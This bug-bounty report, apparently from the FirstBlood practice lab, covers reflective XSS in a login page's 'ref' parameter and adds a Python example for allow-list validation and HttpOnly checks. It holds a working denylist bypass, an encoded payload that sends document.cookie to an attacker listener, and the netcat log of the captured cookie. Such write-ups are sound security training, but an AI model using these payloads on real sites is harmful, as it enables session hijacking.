FirstBlood-#131 — Reflective XSS at http://firstbloodhackers.com:49421/login.php can be used to steal cookie
This issue was discovered on FirstBlood v1
On 2021-05-10, 0xconft (Level 5) reported:
Hi there,
I found reflective XSS on http://firstbloodhackers.com:49421/login.php in the ref parameter, and since firstbloodhackers.com doesn't set the HttpOnly flag on its cookie header, this XSS can be used to steal the cookie. I noticed there's a filter/sanitization on the ref parameter that encodes/replaces certain characters/words (e.g. < > ( alert java javascript), but it's still vulnerable to XSS; it does require user interaction, since the user has to click "return to previous page" for the XSS to be executed.
PoC: alert. You must click "return to previous page" for the XSS to be executed.
http://firstbloodhackers.com:49421/login.php?ref=ja%0dvascript:prompt%2528%271%27)
PoC: steal cookie
When the doctor accesses this URL while logged in at firstbloodhackers.com and clicks "return to previous page", the XSS will be executed and the cookie will be sent to the attacker's server.
http://firstbloodhackers.com:49421/login.php?ref=ja%0Dvascript:eval%2528%27%2576%2561%2572%2520%2578%2568%2572%2520%253d%2520%256e%2565%2577%2520%2558%254d%254c%2548%2574%2574%2570%2552%2565%2571%2575%2565%2573%2574%2528%2529%253b%2578%2568%2572%252e%256f%2570%2565%256e%2528%2522%2547%2545%2554%2522%252c%2520%2522%2568%2574%2574%2570%253a%252f%252f%2531%2539%2532%252e%2531%2536%2538%252e%2530%252e%2532%2530%253a%2531%2533%2533%2537%252f%253f%2575%253d%2522%252b%2564%256f%2563%2575%256d%2565%256e%2574%252e%2563%256f%256f%256b%2569%2565%2529%253b%2578%2568%2572%252e%2573%2565%256e%2564%2528%2529%253b%27)
The cookie will be sent to the attacker's server:
$ nc -lvnp 1337
Listening on 0.0.0.0 1337
Connection received on 192.168.0.20 50888
GET /?u=drps=c172050ce590be85ef316d017 HTTP/1.1
Host: 192.168.0.20:1337
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: http://firstbloodhackers.com:49421
Connection: close
Referer: http://firstbloodhackers.com:49421/
Best Regards,
0xconft
P3 Medium
Endpoint: /login.php
Parameter: ref
Payload: ja%0Dvascript:eval%2528%27%2576%2561%2572%2520%2578%2568%2572%2520%253d%2520%256e%2565%2577%2520%2558%254d%254c%2548%2574%2574%2570%2552%2565%2571%2575%2565%2573%2574%2528%2529%253b%2578%2568%2572%252e%256f%2570%2565%256e%2528%2522%2547%2545%2554%2522%252c%2520%2522%2568%2574%2574%2570%253a%252f%252f%2531%2539%2532%252e%2531%2536%2538%252e%2530%252e%2532%2530%253a%2531%2533%2533%2537%252f%253f%2575%253d%2522%252b%2564%256f%2563%2575%256d%2565%256e%2574%252e%2563%256f%256f%256b%2569%2565%2529%253b%2578%2568%2572%252e%2573%2565%256e%2564%2528%2529%253b%27)
FirstBlood ID: 3
Vulnerability Type: Reflective XSS
The parameter "ref" is vulnerable to XSS on login.php. The developer has tried to prevent a malicious actor from redirecting to a javascript: URI, but the attempt to stop this was poor and thus it can be bypassed.
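The report shows a keyword denylist on `ref` being sidestepped by a carriage return inside the scheme and by double percent-encoding, with cookie theft possible only because the session cookie is not HttpOnly. As an added example (not FirstBlood's login.php code), the Python below validates the "return to previous page" value by allow-listing same-origin paths, judged on the percent-decoded, tab/newline-stripped form that the browser would act on, beside an assumed reconstruction of the kind of denylist the report describes, which shows why that filter never matches the reported input; it also audits a Set-Cookie value for the HttpOnly attribute. The hostname `evil.example`, the cookie value and the request samples are constructed.

```python
"""Server-side handling of a post-login "return to" URL, plus a Set-Cookie audit.

Added example; this is not FirstBlood's login.php code. denylist_filter is an
assumed reconstruction of the filter behaviour the report describes and is
included only to show why it fails. Sample inputs are constructed.
"""
from urllib.parse import unquote, urlsplit

# Browsers drop ASCII tab, CR and LF from a URL before parsing its scheme
# (WHATWG URL standard, "ASCII tab or newline"), which is why the browser
# treats the report's "ja<CR>vascript:" as a javascript: URL.
ASCII_TAB_OR_NEWLINE = frozenset("\t\r\n")


def denylist_filter(ref: str) -> str:
    """Assumed reconstruction of a keyword/character denylist like the one the
    report describes. Do not use; it is here only to demonstrate the weakness."""
    out = ref
    for word in ("javascript", "java", "alert"):
        out = out.replace(word, "")
    for ch in "<>(":
        out = out.replace(ch, "")
    return out


def normalize(ref: str) -> str:
    """Percent-decode until stable (handles %2528 -> %28 -> '(') and remove the
    tab/newline characters a browser ignores, so the check sees what the
    browser will see."""
    cur = ref
    for _ in range(5):  # bounded: stop once a decode pass changes nothing
        decoded = unquote(cur)
        if decoded == cur:
            break
        cur = decoded
    return "".join(c for c in cur if c not in ASCII_TAB_OR_NEWLINE)


def _has_control_chars(s: str) -> bool:
    return any(ord(c) < 0x20 or ord(c) == 0x7F for c in s)


def is_safe_return_path(ref: str) -> bool:
    """Allow-list: only a same-origin absolute path ("/...") with no scheme,
    no authority, no backslash and no control characters is accepted."""
    # Raw control characters (the CR inside "ja<CR>vascript") are never part of
    # a legitimate path and would also enable header injection if the value
    # were ever written into a Location header.
    if _has_control_chars(ref):
        return False
    # Judge the structure on the form the browser would act on.
    n = normalize(ref)
    if not n.startswith("/") or n.startswith("//") or "\\" in n:
        return False
    if _has_control_chars(n):
        return False
    parts = urlsplit(n)
    return parts.scheme == "" and parts.netloc == ""


def safe_return_path(ref: str, default: str = "/") -> str:
    """Value to place in the "return to previous page" link: the validated
    input as received, or the default. The caller must still HTML-escape it
    when writing it into an href attribute."""
    return ref if is_safe_return_path(ref) else default


def cookie_lacks_httponly(set_cookie_value: str) -> bool:
    """True when a Set-Cookie header value carries no HttpOnly attribute
    (attribute names are case-insensitive, RFC 6265)."""
    attrs = [p.strip().split("=", 1)[0].lower()
             for p in set_cookie_value.split(";")[1:]]
    return "httponly" not in attrs


if __name__ == "__main__":
    # Constructed input modelled on the report: what PHP's $_GET would hold
    # after its single decode of ref=ja%0Dvascript:prompt%2528%271%27).
    bypass = "ja\rvascript:prompt%28%271%27)"
    print(repr(denylist_filter(bypass)))             # unchanged: nothing matched
    print(repr(normalize(bypass)))                   # "javascript:prompt('1')"
    print(is_safe_return_path(bypass))               # False
    print(is_safe_return_path("//evil.example/"))    # False
    print(is_safe_return_path("/account?tab=1"))     # True
    print(cookie_lacks_httponly("drps=PLACEHOLDER; Path=/"))            # True
    print(cookie_lacks_httponly("drps=PLACEHOLDER; Path=/; HttpOnly"))  # False
```

The denylist leaves the reported input untouched because the carriage return splits the keyword and the parenthesis only exists after a second decode, while the allow-list never has to recognise a bad scheme: anything that is not a plain same-origin path is replaced by the default. The HttpOnly check is the companion control: with the attribute set, `document.cookie` in an injected script no longer reveals the session value.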
Creator & Administrator
Great finding; even though this is a dupe, I'm awarding a bounty at my discretion.